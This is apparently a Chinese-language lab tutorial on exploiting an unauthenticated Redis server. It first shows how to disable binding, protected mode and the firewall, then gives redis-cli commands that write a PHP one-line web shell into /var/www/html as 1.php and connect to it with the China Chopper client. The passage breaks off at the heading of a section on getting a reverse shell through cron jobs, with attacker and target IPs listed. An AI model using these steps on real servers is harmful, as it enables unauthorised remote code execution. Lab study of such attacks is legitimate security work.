2.redis安装步骤
a.解压redis
tar -zxvf redis-3.2.9.tar.gz
b.重命名redis
mv redis-3.2.9 /usr/local/redis
c.编译安装redis
cd /usr/local/redis
make & make install
redis刚安装好时只能通过本地localhost (127.0.0.1)访问,而不能用其他网络ip区访问,如果没有配置好redis.conf使用网络ip访问redis会报以下的错误:
(error) DENIED Redis is running in protected mode because protected mode is enabled, no bind address was specified, no authentication password is requested to clients. In this mode connections are only accepted from the lookback interface. If you want to connect from external computers to Redis you may adopt one of the following solutions: 1) Just disable protected mode sending the command 'CONFIG SET protected-mode no' from the loopback interface by connecting to Redis from the same host the server is running, however MAKE SURE Redis is not publicly accessible from internet if you do so. Use CONFIG REWRITE to make this change permanent. 2) Alternatively you can just disable the protected mode by editing the Redis configuration file, and setting the protected mode option to 'no', and then restarting the server. 3) If you started the server manually just for testing, restart it with the --portected-mode no option. 4) Setup a bind address or an authentication password. NOTE: You only need to do one of the above things in order for the server to start accepting connections from the outside.
复制代码
出现这个错误说明redis处于保护模式,只能本地访问,我们需要修改配置文件redis.conf配置文件。
1)打开配置文件把下面对应的注释掉(或者可以针对自己的ip进行bind)
# bind 127.0.0.1
2)Redis默认不是以守护进程的方式运行,可以通过该配置项修改,使用yes启用守护进程,设置为no
daemonize no
3)保护模式
protected-mode no
4)重新启动配置文件才会生效:
redis-server redis.conf(在redis.conf文件目录下执行)
5)关闭防火墙
6)出现如下信息说明环境已配置完成
2.测试步骤
./redis-cli -h 192.168.192.181
config set dir /var/www/html set x "\n\n\n<?php @eval($_POST['cc']);?>\n\n\n"
config set dbfilename 1.php
Save
用菜刀连接:
打开虚拟终端执行命令:
二、利用计划任务执行命令反弹shell 1.测试环境
攻击A(kali):192.168.192.171
靶机B(CentOS):192.168.192.181